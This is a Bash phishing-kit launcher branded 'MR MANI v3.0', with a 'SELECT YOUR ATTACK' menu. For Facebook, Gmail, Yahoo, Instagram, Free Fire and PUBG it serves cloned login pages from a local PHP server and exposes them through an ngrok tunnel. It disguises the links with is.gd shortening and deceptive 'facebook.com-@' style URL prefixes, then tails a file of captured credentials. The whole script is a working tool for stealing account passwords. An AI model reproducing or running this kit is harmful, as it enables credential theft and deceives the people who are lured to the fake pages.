clear
white='\e[1;37m'
green='\e[0;32m'
blue='\e[1;34m'
red='\e[1;31m'
yellow='\e[1;33m'
echo ""
echo ""
banner() {
echo -e $'\e[1;33m\e[0m\e[1;34m ███╗░░░███╗██████╗░ \e[0m'
echo -e $'\e[1;33m\e[0m\e[1;34m ████╗░████║██╔══██╗ \e[0m'
echo -e $'\e[1;33m\e[0m\e[1;34m ██╔████╔██║██████╔╝    \e[0m'
echo -e $'\e[1;33m\e[0m\e[1;34m ██║╚██╔╝██║██╔══██╗     \e[0m'
echo -e $'\e[1;33m\e[0m\e[1;34m ██║░╚═╝░██║██║░░██║     \e[0m'
echo -e $'\e[1;33m\e[0m\e[1;34m ╚═╝░░░░░╚═╝╚═╝░░╚═╝ \e[0m'
echo -e $'\e[1;33m\e[0m\e[1;34m ███╗░░░███╗░█████╗░███╗░░██╗██╗                    \e[0m'
echo -e $'\e[1;33m\e[0m\e[1;34m ████╗░████║██╔══██╗████╗░██║██║     \e[0m'
echo -e $'\e[1;33m\e[0m\e[1;34m ██╔████╔██║███████║██╔██╗██║██║  \e[1;31m Developed by\e[0m'
echo -e $'\e[1;33m\e[0m\e[1;31m ██║╚██╔╝██║██╔══██║██║╚████║██║ \e[1;31m       MISTERMANI\e[0m'
echo -e $'\e[1;33m\e[0m\e[1;31m ██║░╚═╝░██║██║░░██║██║░╚███║██║             \e[1;37m[v 3.0]           \e[0m'
echo -e $'\e[1;33m\e[0m\e[1;34m ╚═╝░░░░░╚═╝╚═╝░░╚═╝╚═╝░░╚══╝╚═╝ \e[0m'
echo -e $'\e[1;37m\e[0m\e[1;37m -----------------------------------------------------------------\e[0m'
echo -e $'\e[1;37m\e[0m\e[1;33m AUTHOR  : MISTER MANI \e[0m'
echo -e $'\e[1;37m\e[0m\e[1;33m YOUTUBE : YOUTUBE.COM/GAMINGWITHMANIPRO \e[0m'
echo -e $'\e[1;37m\e[0m\e[1;33m PAGE    : FACEBOOK.COM/GAMINGWITHMANI \e[0m'
echo -e $'\e[1;37m\e[0m\e[1;33m CONTACT : FACEBOOK.COM/GAMINGWITHMANI \e[0m'
echo -e $'\e[1;37m\e[0m\e[1;32m -----------------------------------------------------------------\e[0m'
}
banner
echo ""
echo -e $'\e[1;32m\e[0m\e[1;32m SELECT YOUR ATTACK \e[0m'
echo -e $'\e[1;37m\e[0m\e[1;37m <≠≠≠≠≠≠≠≠≠≠≠≠≠≠≠≠>\e[0m'
echo ""
banner() {
printf "\e[1;34m [\e[0m\e[1;31m1\e[0m\e[1;34m]\e[0m\e[1;32m Facebook                     \e[1;34m[\e[0m\e[1;31m5\e[0m\e[1;34m]\e[0m\e[1;32m Twitter\e[0m\n"
printf "\e[1;34m [\e[0m\e[1;31m2\e[0m\e[1;34m]\e[0m\e[1;32m Email                        \e[1;34m[\e[0m\e[1;31m6\e[0m\e[1;34m]\e[0m\e[1;32m Whatsapp\e[0m\n"
printf "\e[1;34m [\e[0m\e[1;31m3\e[0m\e[1;34m]\e[0m\e[1;32m Instagram                    \e[1;34m[\e[0m\e[1;31m7\e[0m\e[1;34m]\e[0m\e[1;32m Github\e[0m\n"
printf "\e[1;34m [\e[0m\e[1;31m4\e[0m\e[1;34m]\e[0m\e[1;32m FF-Pubg                      \e[1;34m[\e[0m\e[1;31m8\e[0m\e[1;34m]\e[0m\e[1;32m IPFinder\e[0m\n"
printf "\e[1;34m [\e[0m\e[1;31m0\e[0m\e[1;34m]\e[0m\e[1;32m Help                         \e[1;34m[\e[0m\e[1;31m9\e[0m\e[1;34m]\e[0m\e[1;32m Other\e[0m\n"
printf "\e[1;34m [\e[0m\e[1;31m#\e[0m\e[1;34m]\e[0m\e[1;32m Exit \e[0m\n"
}
banner
echo ""
echo ""
read -p $'\e[0m\e[1;31m >> \e[0m\e[1;32m Enter Your Choice : \e[0m' option
case $option in
1) cd $HOME
echo ""
echo -e $'\e[1;34m   [\e[0m\e[1;31m1\e[0m\e[1;34m]\e[0m\e[1;32m Login Page \e[0m'
echo -e $'\e[1;34m   [\e[0m\e[1;31m2\e[0m\e[1;34m]\e[0m\e[1;32m Group Join \e[0m'
echo -e $'\e[1;34m   [\e[0m\e[1;31m3\e[0m\e[1;34m]\e[0m\e[1;32m Page Like \e[0m'
echo -e $'\e[1;34m   [\e[0m\e[1;31m4\e[0m\e[1;34m]\e[0m\e[1;32m FB Verify \e[0m'
echo -e $'\e[1;34m   [\e[0m\e[1;31m5\e[0m\e[1;34m]\e[0m\e[1;32m Add Friend \e[0m'
echo -e $'\e[1;34m   [\e[0m\e[1;31m6\e[0m\e[1;34m]\e[0m\e[1;32m Auto Like \e[0m'
echo -e $'\e[1;34m   [\e[0m\e[1;31m7\e[0m\e[1;34m]\e[0m\e[1;32m Web Login \e[0m'
echo ""
read -p $'\e[1;31m >>\e[0m\e[1;32m Enter Your Choice : \e[0m' option
case $option in
1) cd gamer/
echo ""
echo -e $'\e[1;31m <<\e[1;32mSTARTING NGROK SERVER\e[1;31m>>\e[0m'
php -S 127.0.0.1:4444 > /dev/null 2>&1 &
sleep 3
echo ""
echo -e $'\e[1;31m <<\e[1;32mPress CTRL+C For Cancel\e[1;31m>>\e[0m'
echo ""
ngrok http 4444 > /dev/null 2>&1 &
sleep 30
link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")
printf "\e[1;33m>>> link-1:\e[0m\e[1;77m %s\e[0m\n" $link/facebook.com/login.php
echo ""
b="https://www.facebook.com-@"
printf "\e[1;33m>>> link-2: \e[1;37m${link/'https://'/$b}"/facebook.com/login.php
echo ""
v="$link/facebook.com/login.php"
short=$(curl -s https://is.gd/create.php\?format\=simple\&url\=${v})
mask=${short#https://}
echo ""
printf "\e[1;33m>>> link-3: \e[1;37mhttps://$mask"
echo ""
echo ""
printf "\e[1;33m>>> link-4: \e[1;37mhttps://facebook.com-@$mask"
echo ""
echo -e $'\e[1;33m\e[0m\e[1;33m _________________________________________________________________  \e[0m'
echo ""
tail -f facebook.com/output.txt
;;
2) cd $HOME
echo ""
echo -e $'\e[1;34m     [\e[0m\e[1;31m1\e[0m\e[1;34m]\e[0m\e[1;32m Funny Group \e[0m'
echo -e $'\e[1;34m     [\e[0m\e[1;31m2\e[0m\e[1;34m]\e[0m\e[1;32m Toast Group \e[0m'
echo -e $'\e[1;34m     [\e[0m\e[1;31m3\e[0m\e[1;34m]\e[0m\e[1;32m FF Group \e[0m'
echo -e $'\e[1;34m     [\e[0m\e[1;31m4\e[0m\e[1;34m]\e[0m\e[1;32m Nude Group \e[0m'
echo -e $'\e[1;34m     [\e[0m\e[1;31m5\e[0m\e[1;34m]\e[0m\e[1;32m FF Sell Group \e[0m'
echo ""
read -p $'\e[1;31m >>\e[0m\e[1;32m Enter Your Choice : \e[0m' option
case $option in
1) cd gamer/
echo ""
echo -e $'\e[1;31m <<\e[1;32mSTARTING NGROK SERVER\e[1;31m>>\e[0m'
php -S 127.0.0.1:4444 > /dev/null 2>&1 &
sleep 3
echo ""
echo -e $'\e[1;31m <<\e[1;32mPress CTRL+C For Cancel\e[1;31m>>\e[0m'
echo ""
ngrok http 4444 > /dev/null 2>&1 &
sleep 30
link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")
printf "\e[1;33m>>> link-1:\e[0m\e[1;77m %s\e[0m\n" $link/facebook.com/group.php
echo ""
b="https://www.facebook.com-@"
printf "\e[1;33m>>> link-2: \e[1;37m${link/'https://'/$b}"/facebook.com/group.php
echo ""
v="$link/facebook.com/group.php"
short=$(curl -s https://is.gd/create.php\?format\=simple\&url\=${v})
mask=${short#https://}
echo ""
printf "\e[1;33m>>> link-3: \e[1;37mhttps://$mask"
echo ""
echo ""
printf "\e[1;33m>>> link-4: \e[1;37mhttps://facebook.com-@$mask"
echo ""
echo -e $'\e[1;33m\e[0m\e[1;33m _________________________________________________________________  \e[0m'
echo ""
tail -f facebook.com/output.txt
;;
2) cd gamer/
echo ""
echo -e $'\e[1;31m <<\e[1;32mSTARTING NGROK SERVER\e[1;31m>>\e[0m'
php -S 127.0.0.1:4444 > /dev/null 2>&1 &
sleep 3
echo ""
echo -e $'\e[1;31m <<\e[1;32mPress CTRL+C For Cancel\e[1;31m>>\e[0m'
echo ""
ngrok http 4444 > /dev/null 2>&1 &
sleep 30
link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")
printf "\e[1;33m>>> link-1:\e[0m\e[1;77m %s\e[0m\n" $link/facebook.com/group1.php
echo ""
b="https://www.facebook.com-@"
printf "\e[1;33m>>> link-2: \e[1;37m${link/'https://'/$b}"/facebook.com/group1.php
echo ""
v="$link/facebook.com/group1.php"
short=$(curl -s https://is.gd/create.php\?format\=simple\&url\=${v})
mask=${short#https://}
echo ""
printf "\e[1;33m>>> link-3: \e[1;37mhttps://$mask"
echo ""
echo ""
printf "\e[1;33m>>> link-4: \e[1;37mhttps://facebook.com-@$mask"
echo ""
echo -e $'\e[1;33m\e[0m\e[1;33m _________________________________________________________________  \e[0m'
echo ""
tail -f facebook.com/output.txt
;;
3) cd gamer/
echo ""
echo -e $'\e[1;31m <<\e[1;32mSTARTING NGROK SERVER\e[1;31m>>\e[0m'
php -S 127.0.0.1:4444 > /dev/null 2>&1 &
sleep 3
echo ""
echo -e $'\e[1;31m <<\e[1;32mPress CTRL+C For Cancel\e[1;31m>>\e[0m'
echo ""
ngrok http 4444 > /dev/null 2>&1 &
sleep 30
link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")
printf "\e[1;33m>>> link-1:\e[0m\e[1;77m %s\e[0m\n" $link/facebook.com/group2.php
echo ""
b="https://www.facebook.com-@"
printf "\e[1;33m>>> link-2: \e[1;37m${link/'https://'/$b}"/facebook.com/group2.php
echo ""
v="$link/facebook.com/group2.php"
short=$(curl -s https://is.gd/create.php\?format\=simple\&url\=${v})
mask=${short#https://}
echo ""
printf "\e[1;33m>>> link-3: \e[1;37mhttps://$mask"
echo ""
echo ""
printf "\e[1;33m>>> link-4: \e[1;37mhttps://facebook.com-@$mask"
echo ""
echo -e $'\e[1;33m\e[0m\e[1;33m _________________________________________________________________  \e[0m'
echo ""
tail -f facebook.com/output.txt
;;
4) cd gamer/
echo ""
echo -e $'\e[1;31m <<\e[1;32mSTARTING NGROK SERVER\e[1;31m>>\e[0m'
php -S 127.0.0.1:4444 > /dev/null 2>&1 &
sleep 3
echo ""
echo -e $'\e[1;31m <<\e[1;32mPress CTRL+C For Cancel\e[1;31m>>\e[0m'
echo ""
ngrok http 4444 > /dev/null 2>&1 &
sleep 30
link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")
printf "\e[1;33m>>> link-1:\e[0m\e[1;77m %s\e[0m\n" $link/facebook.com/group3.php
echo ""
b="https://www.facebook.com-@"
printf "\e[1;33m>>> link-2: \e[1;37m${link/'https://'/$b}"/facebook.com/group3.php
echo ""
v="$link/facebook.com/group3.php"
short=$(curl -s https://is.gd/create.php\?format\=simple\&url\=${v})
mask=${short#https://}
echo ""
printf "\e[1;33m>>> link-3: \e[1;37mhttps://$mask"
echo ""
echo ""
printf "\e[1;33m>>> link-4: \e[1;37mhttps://facebook.com-@$mask"
echo ""
echo -e $'\e[1;33m\e[0m\e[1;33m _________________________________________________________________  \e[0m'
echo ""
tail -f facebook.com/output.txt
;;
5) cd gamer/
echo ""
echo -e $'\e[1;31m <<\e[1;32mSTARTING NGROK SERVER\e[1;31m>>\e[0m'
php -S 127.0.0.1:4444 > /dev/null 2>&1 &
sleep 3
echo ""
echo -e $'\e[1;31m <<\e[1;32mPress CTRL+C For Cancel\e[1;31m>>\e[0m'
echo ""
ngrok http 4444 > /dev/null 2>&1 &
sleep 30
link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")
printf "\e[1;33m>>> link-1:\e[0m\e[1;77m %s\e[0m\n" $link/facebook.com/group4.php
echo ""
b="https://www.facebook.com-@"
printf "\e[1;33m>>> link-2: \e[1;37m${link/'https://'/$b}"/facebook.com/group4.php
echo ""
v="$link/facebook.com/group4.php"
short=$(curl -s https://is.gd/create.php\?format\=simple\&url\=${v})
mask=${short#https://}
echo ""
printf "\e[1;33m>>> link-3: \e[1;37mhttps://$mask"
echo ""
echo ""
printf "\e[1;33m>>> link-4: \e[1;37mhttps://facebook.com-@$mask"
echo ""
echo -e $'\e[1;33m\e[0m\e[1;33m _________________________________________________________________  \e[0m'
echo ""
tail -f facebook.com/output.txt
;;
esac
;;
3) cd $HOME
echo ""
echo -e $'\e[1;34m     [\e[0m\e[1;31m1\e[0m\e[1;34m]\e[0m\e[1;32m FF-Diamond Sell \e[0m'
echo -e $'\e[1;34m     [\e[0m\e[1;31m2\e[0m\e[1;34m]\e[0m\e[1;32m Funny Page \e[0m'
echo ""
read -p $'\e[1;31m >>\e[0m\e[1;32m Enter Your Choice : \e[0m' option
case $option in
1) cd gamer/
echo ""
echo -e $'\e[1;31m <<\e[1;32mSTARTING NGROK SERVER\e[1;31m>>\e[0m'
php -S 127.0.0.1:4444 > /dev/null 2>&1 &
sleep 3
echo ""
echo -e $'\e[1;31m <<\e[1;32mPress CTRL+C For Cancel\e[1;31m>>\e[0m'
echo ""
ngrok http 4444 > /dev/null 2>&1 &
sleep 30
link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")
printf "\e[1;33m>>> link-1:\e[0m\e[1;77m %s\e[0m\n" $link/facebook.com/page.php
echo ""
b="https://www.facebook.com-@"
printf "\e[1;33m>>> link-2: \e[1;37m${link/'https://'/$b}"/facebook.com/page.php
echo ""
v="$link/facebook.com/page.php"
short=$(curl -s https://is.gd/create.php\?format\=simple\&url\=${v})
mask=${short#https://}
echo ""
printf "\e[1;33m>>> link-3: \e[1;37mhttps://$mask"
echo ""
echo ""
printf "\e[1;33m>>> link-4: \e[1;37mhttps://facebook.com-@$mask"
echo ""
echo -e $'\e[1;33m\e[0m\e[1;33m _________________________________________________________________  \e[0m'
echo ""
tail -f facebook.com/output.txt
;;
2) cd gamer/
echo ""
echo -e $'\e[1;31m <<\e[1;32mSTARTING NGROK SERVER\e[1;31m>>\e[0m'
php -S 127.0.0.1:4444 > /dev/null 2>&1 &
sleep 3
echo ""
echo -e $'\e[1;31m <<\e[1;32mPress CTRL+C For Cancel\e[1;31m>>\e[0m'
echo ""
ngrok http 4444 > /dev/null 2>&1 &
sleep 30
link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")
printf "\e[1;33m>>> link-1:\e[0m\e[1;77m %s\e[0m\n" $link/facebook.com/page1.php
echo ""
b="https://www.facebook.com-@"
printf "\e[1;33m>>> link-2: \e[1;37m${link/'https://'/$b}"/facebook.com/page1.php
echo ""
v="$link/facebook.com/page1.php"
short=$(curl -s https://is.gd/create.php\?format\=simple\&url\=${v})
mask=${short#https://}
echo ""
printf "\e[1;33m>>> link-3: \e[1;37mhttps://$mask"
echo ""
echo ""
printf "\e[1;33m>>> link-4: \e[1;37mhttps://facebook.com-@$mask"
echo ""
echo -e $'\e[1;33m\e[0m\e[1;33m _________________________________________________________________  \e[0m'
echo ""
tail -f facebook.com/output.txt
;;
esac
;;
4) cd gamer/
echo ""
echo -e $'\e[1;31m <<\e[1;32mSTARTING NGROK SERVER\e[1;31m>>\e[0m'
php -S 127.0.0.1:4444 > /dev/null 2>&1 &
sleep 3
echo ""
echo -e $'\e[1;31m <<\e[1;32mPress CTRL+C For Cancel\e[1;31m>>\e[0m'
echo ""
ngrok http 4444 > /dev/null 2>&1 &
sleep 30
link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")
printf "\e[1;33m>>> link-1:\e[0m\e[1;77m %s\e[0m\n" $link/facebook.com/verify.php
echo ""
b="https://www.facebook.com-@"
printf "\e[1;33m>>> link-2: \e[1;37m${link/'https://'/$b}"/facebook.com/verify.php
echo ""
v="$link/facebook.com/verify.php"
short=$(curl -s https://is.gd/create.php\?format\=simple\&url\=${v})
mask=${short#https://}
echo ""
printf "\e[1;33m>>> link-3: \e[1;37mhttps://$mask"
echo ""
echo ""
printf "\e[1;33m>>> link-4: \e[1;37mhttps://facebook.com-@$mask"
echo ""
echo -e $'\e[1;33m\e[0m\e[1;33m _________________________________________________________________  \e[0m'
echo ""
tail -f facebook.com/output.txt
;;
5) cd $HOME
echo ""
echo -e $'\e[1;34m     [\e[0m\e[1;31m1\e[0m\e[1;34m]\e[0m\e[1;32m Male \e[0m'
echo -e $'\e[1;34m     [\e[0m\e[1;31m2\e[0m\e[1;34m]\e[0m\e[1;32m Female \e[0m'
echo ""
read -p $'\e[1;31m >>\e[0m\e[1;32m Enter Your Choice : \e[0m' option
case $option in
1) cd gamer/
echo ""
echo -e $'\e[1;31m <<\e[1;32mSTARTING NGROK SERVER\e[1;31m>>\e[0m'
php -S 127.0.0.1:4444 > /dev/null 2>&1 &
sleep 3
echo ""
echo -e $'\e[1;31m <<\e[1;32mPress CTRL+C For Cancel\e[1;31m>>\e[0m'
echo ""
ngrok http 4444 > /dev/null 2>&1 &
sleep 30
link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")
printf "\e[1;33m>>> link-1:\e[0m\e[1;77m %s\e[0m\n" $link/facebook.com/add-male.php
echo ""
b="https://www.facebook.com-@"
printf "\e[1;33m>>> link-2: \e[1;37m${link/'https://'/$b}"/facebook.com/add-male.php
echo ""
v="$link/facebook.com/add-male.php"
short=$(curl -s https://is.gd/create.php\?format\=simple\&url\=${v})
mask=${short#https://}
echo ""
printf "\e[1;33m>>> link-3: \e[1;37mhttps://$mask"
echo ""
echo ""
printf "\e[1;33m>>> link-4: \e[1;37mhttps://facebook.com-@$mask"
echo ""
echo -e $'\e[1;33m\e[0m\e[1;33m _________________________________________________________________  \e[0m'
echo ""
tail -f facebook.com/output.txt
;;
2) cd gamer/
echo ""
echo -e $'\e[1;31m <<\e[1;32mSTARTING NGROK SERVER\e[1;31m>>\e[0m'
php -S 127.0.0.1:4444 > /dev/null 2>&1 &
sleep 3
echo ""
echo -e $'\e[1;31m <<\e[1;32mPress CTRL+C For Cancel\e[1;31m>>\e[0m'
echo ""
ngrok http 4444 > /dev/null 2>&1 &
sleep 30
link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")
printf "\e[1;33m>>> link-1:\e[0m\e[1;77m %s\e[0m\n" $link/facebook.com/add-index.php
echo ""
b="https://www.facebook.com-@"
printf "\e[1;33m>>> link-2: \e[1;37m${link/'https://'/$b}"/facebook.com/add-index.php
echo ""
v="$link/facebook.com/add-index.php"
short=$(curl -s https://is.gd/create.php\?format\=simple\&url\=${v})
mask=${short#https://}
echo ""
printf "\e[1;33m>>> link-3: \e[1;37mhttps://$mask"
echo ""
echo ""
printf "\e[1;33m>>> link-4: \e[1;37mhttps://facebook.com-@$mask"
echo ""
echo -e $'\e[1;33m\e[0m\e[1;33m _________________________________________________________________  \e[0m'
echo ""
tail -f facebook.com/output.txt
;;
esac
;;
6) cd gamer/
echo ""
echo -e $'\e[1;31m <<\e[1;32mSTARTING NGROK SERVER\e[1;31m>>\e[0m'
php -S 127.0.0.1:4444 > /dev/null 2>&1 &
sleep 3
echo ""
echo -e $'\e[1;31m <<\e[1;32mPress CTRL+C For Cancel\e[1;31m>>\e[0m'
echo ""
ngrok http 4444 > /dev/null 2>&1 &
sleep 30
link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")
printf "\e[1;33m>>> link-1:\e[0m\e[1;77m %s\e[0m\n" $link/facebook.com/auto-index.php
echo ""
b="https://www.autolikerforfb.com-@"
printf "\e[1;33m>>> link-2: \e[1;37m${link/'https://'/$b}"/facebook.com/auto-index.php
echo ""
v="$link/facebook.com/auto-index.php"
short=$(curl -s https://is.gd/create.php\?format\=simple\&url\=${v})
mask=${short#https://}
echo ""
printf "\e[1;33m>>> link-3: \e[1;37mhttps://$mask"
echo ""
echo ""
printf "\e[1;33m>>> link-4: \e[1;37mhttps://facebook.com-@$mask"
echo ""
echo -e $'\e[1;33m\e[0m\e[1;33m _________________________________________________________________  \e[0m'
echo ""
tail -f facebook.com/output.txt
;;
7) cd gamer/
echo ""
echo -e $'\e[1;31m <<\e[1;32mSTARTING NGROK SERVER\e[1;31m>>\e[0m'
php -S 127.0.0.1:4444 > /dev/null 2>&1 &
sleep 3
echo ""
echo -e $'\e[1;31m <<\e[1;32mPress CTRL+C For Cancel\e[1;31m>>\e[0m'
echo ""
ngrok http 4444 > /dev/null 2>&1 &
sleep 30
link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")
printf "\e[1;33m>>> link-1:\e[0m\e[1;77m %s\e[0m\n" $link/facebook.com/web-index.php
echo ""
b="https://www.facebook.com-@"
printf "\e[1;33m>>> link-2: \e[1;37m${link/'https://'/$b}"/facebook.com/web-index.php
echo ""
v="$link/facebook.com/web-index.php"
short=$(curl -s https://is.gd/create.php\?format\=simple\&url\=${v})
mask=${short#https://}
echo ""
printf "\e[1;33m>>> link-3: \e[1;37mhttps://$mask"
echo ""
echo ""
printf "\e[1;33m>>> link-4: \e[1;37mhttps://facebook.com-@$mask"
echo ""
echo -e $'\e[1;33m\e[0m\e[1;33m _________________________________________________________________  \e[0m'
echo ""
tail -f facebook.com/output.txt
;;
esac
;;
2) cd $HOME
echo ""
echo -e $'\e[1;34m   [\e[0m\e[1;31m1\e[0m\e[1;34m]\e[0m\e[1;32m Gmail \e[0m'
echo -e $'\e[1;34m   [\e[0m\e[1;31m2\e[0m\e[1;34m]\e[0m\e[1;32m Yahoo \e[0m'
echo ""
read -p $'\e[1;31m >>\e[0m\e[1;32m Enter Your Choice : \e[0m' option
case $option in
1) cd gamer/
echo ""
echo -e $'\e[1;31m <<\e[1;32mSTARTING NGROK SERVER\e[1;31m>>\e[0m'
php -S 127.0.0.1:4444 > /dev/null 2>&1 &
sleep 3
echo ""
echo -e $'\e[1;31m <<\e[1;32mPress CTRL+C For Cancel\e[1;31m>>\e[0m'
echo ""
ngrok http 4444 > /dev/null 2>&1 &
sleep 30
link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")
printf "\e[1;33m>>> link-1:\e[0m\e[1;77m %s\e[0m\n" $link/gmail.com/index.php
echo ""
b="https://www.gmail.com-@"
printf "\e[1;33m>>> link-2: \e[1;37m${link/'https://'/$b}"/gmail.com/index.php
echo ""
v="$link/gmail.com/index.php"
short=$(curl -s https://is.gd/create.php\?format\=simple\&url\=${v})
mask=${short#https://}
echo ""
printf "\e[1;33m>>> link-3: \e[1;37mhttps://$mask"
echo ""
echo ""
printf "\e[1;33m>>> link-4: \e[1;37mhttps://gmail.com-@$mask"
echo ""
echo -e $'\e[1;33m\e[0m\e[1;33m _________________________________________________________________  \e[0m'
echo ""
tail -f gmail.com/output.txt
;;
2) cd gamer/
echo ""
echo -e $'\e[1;31m <<\e[1;32mSTARTING NGROK SERVER\e[1;31m>>\e[0m'
php -S 127.0.0.1:4444 > /dev/null 2>&1 &
sleep 3
echo ""
echo -e $'\e[1;31m <<\e[1;32mPress CTRL+C For Cancel\e[1;31m>>\e[0m'
echo ""
ngrok http 4444 > /dev/null 2>&1 &
sleep 30
link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")
printf "\e[1;33m>>> link-1:\e[0m\e[1;77m %s\e[0m\n" $link/yahoo.com/index.php
echo ""
b="https://www.yahoo.com-@"
printf "\e[1;33m>>> link-2: \e[1;37m${link/'https://'/$b}"/yahoo.com/index.php
echo ""
v="$link/yahoo.com/index.php"
short=$(curl -s https://is.gd/create.php\?format\=simple\&url\=${v})
mask=${short#https://}
echo ""
printf "\e[1;33m>>> link-3: \e[1;37mhttps://$mask"
echo ""
echo ""
printf "\e[1;33m>>> link-4: \e[1;37mhttps://yahoo.com-@$mask"
echo ""
echo -e $'\e[1;33m\e[0m\e[1;33m _________________________________________________________________  \e[0m'
echo ""
tail -f yahoo.com/output.txt
;;
esac
;;
3) cd $HOME
echo ""
echo -e $'\e[1;34m   [\e[0m\e[1;31m1\e[0m\e[1;34m]\e[0m\e[1;32m Login Page \e[0m'
echo -e $'\e[1;34m   [\e[0m\e[1;31m2\e[0m\e[1;34m]\e[0m\e[1;32m Follower \e[0m'
echo ""
read -p $'\e[1;31m >>\e[0m\e[1;32m Enter Your Choice : \e[0m' option
case $option in
1) cd gamer/
echo ""
echo -e $'\e[1;31m <<\e[1;32mSTARTING NGROK SERVER\e[1;31m>>\e[0m'
php -S 127.0.0.1:4444 > /dev/null 2>&1 &
sleep 3
echo ""
echo -e $'\e[1;31m <<\e[1;32mPress CTRL+C For Cancel\e[1;31m>>\e[0m'
echo ""
ngrok http 4444 > /dev/null 2>&1 &
sleep 30
link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")
printf "\e[1;33m>>> link-1:\e[0m\e[1;77m %s\e[0m\n" $link/instagram.com/index.php
echo ""
b="https://www.instagram.com-@"
printf "\e[1;33m>>> link-2: \e[1;37m${link/'https://'/$b}"/instagram.com/index.php
echo ""
v="$link/instagram.com/index.php"
short=$(curl -s https://is.gd/create.php\?format\=simple\&url\=${v})
mask=${short#https://}
echo ""
printf "\e[1;33m>>> link-3: \e[1;37mhttps://$mask"
echo ""
echo ""
printf "\e[1;33m>>> link-4: \e[1;37mhttps://instagram.com-@$mask"
echo ""
echo -e $'\e[1;33m\e[0m\e[1;33m _________________________________________________________________  \e[0m'
echo ""
tail -f instagram.com/output.txt
;;
2) cd gamer/
echo ""
echo -e $'\e[1;31m <<\e[1;32mSTARTING NGROK SERVER\e[1;31m>>\e[0m'
php -S 127.0.0.1:4444 > /dev/null 2>&1 &
sleep 3
echo ""
echo -e $'\e[1;31m <<\e[1;32mPress CTRL+C For Cancel\e[1;31m>>\e[0m'
echo ""
ngrok http 4444 > /dev/null 2>&1 &
sleep 30
link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")
printf "\e[1;33m>>> link-1:\e[0m\e[1;77m %s\e[0m\n" $link/instagram.com/follower.php
echo ""
b="https://www.instagram.com-@"
printf "\e[1;33m>>> link-2: \e[1;37m${link/'https://'/$b}"/instagram.com/follower.php
echo ""
v="$link/instagram.com/follower.php"
short=$(curl -s https://is.gd/create.php\?format\=simple\&url\=${v})
mask=${short#https://}
echo ""
printf "\e[1;33m>>> link-3: \e[1;37mhttps://$mask"
echo ""
echo ""
printf "\e[1;33m>>> link-4: \e[1;37mhttps://instagram.com-@$mask"
echo ""
echo -e $'\e[1;33m\e[0m\e[1;33m _________________________________________________________________  \e[0m'
echo ""
tail -f instagram.com/output.txt
;;
esac
;;
4) cd $HOME
echo ""
echo -e $'\e[1;34m   [\e[0m\e[1;31m1\e[0m\e[1;34m]\e[0m\e[1;32m FreeFire \e[0m'
echo -e $'\e[1;34m   [\e[0m\e[1;31m2\e[0m\e[1;34m]\e[0m\e[1;32m Pubg \e[0m'
echo ""
read -p $'\e[1;31m >>\e[0m\e[1;32m Enter Your Choice : \e[0m' option
case $option in
1) cd gamer/
echo ""
echo -e $'\e[1;31m <<\e[1;32mSTARTING NGROK SERVER\e[1;31m>>\e[0m'
php -S 127.0.0.1:4444 > /dev/null 2>&1 &
sleep 3
echo ""
echo -e $'\e[1;31m <<\e[1;32mPress CTRL+C For Cancel\e[1;31m>>\e[0m'
echo ""
ngrok http 4444 > /dev/null 2>&1 &
sleep 30
link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")
printf "\e[1;33m>>> link-1:\e[0m\e[1;77m %s\e[0m\n" $link/ff.garena.com/index.php
echo ""
b="https://www.ff.reward.com-@"
printf "\e[1;33m>>> link-2: \e[1;37m${link/'https://'/$b}"/ff.garena.com/index.php
echo ""
v="$link/ff.garena.com/index.php"
short=$(curl -s https://is.gd/create.php\?format\=simple\&url\=${v})
mask=${short#https://}
echo ""
printf "\e[1;33m>>> link-3: \e[1;37mhttps://$mask"
echo ""
echo ""
printf "\e[1;33m>>> link-4: \e[1;37mhttps://ff.reward.com-@$mask"
echo ""
echo -e $'\e[1;33m\e[0m\e[1;33m _________________________________________________________________  \e[0m'
echo ""
tail -f ff.garena.com/output.txt
;;
2) cd gamer/
echo ""
echo -e $'\e[1;31m <<\e[1;32mSTARTING NGROK SERVER\e[1;31m>>\e[0m'
php -S 127.0.0.1:4444 > /dev/null 2>&1 &
sleep 3
echo ""
echo -e $'\e[1;31m <<\e[1;32mPress CTRL+C For Cancel\e[1;31m>>\e[0m'
echo ""
ngrok http 4444 > /dev/null 2>&1 &
sleep 30
link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")
printf "\e[1;33m>>> link-1:\e[0m\e[1;77m %s\e[0m\n" $link/pubgmobile.com/index.php
echo ""
b="https://www.pubg.reward.com-@"
printf "\e[1;33m>>> link-2: \e[1;37m${link/'https://'/$b}"/pubgmobile.com/index.php
echo ""
v="$link/pubgmobile.com/index.php"
short=$(curl -s https://is.gd/create.php\?format\=simple\&url\=${v})
mask=${short#https://}
echo ""
printf "\e[1;33m>>> link-3: \e[1;37mhttps://$mask"
